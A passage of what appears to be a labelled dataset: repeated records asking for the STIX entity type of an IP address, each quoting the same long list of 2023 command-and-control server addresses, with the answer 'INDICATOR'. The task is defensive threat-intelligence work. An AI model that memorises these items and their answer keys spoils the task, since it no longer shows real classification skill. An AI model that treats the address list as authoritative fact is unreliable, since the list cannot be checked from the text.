"input": "### Entity:\n206.189.149.103\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n167.71.67.58\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n143.198.135.132\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n140.82.11.60\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n31.129.22.46\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n146.190.212.239\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 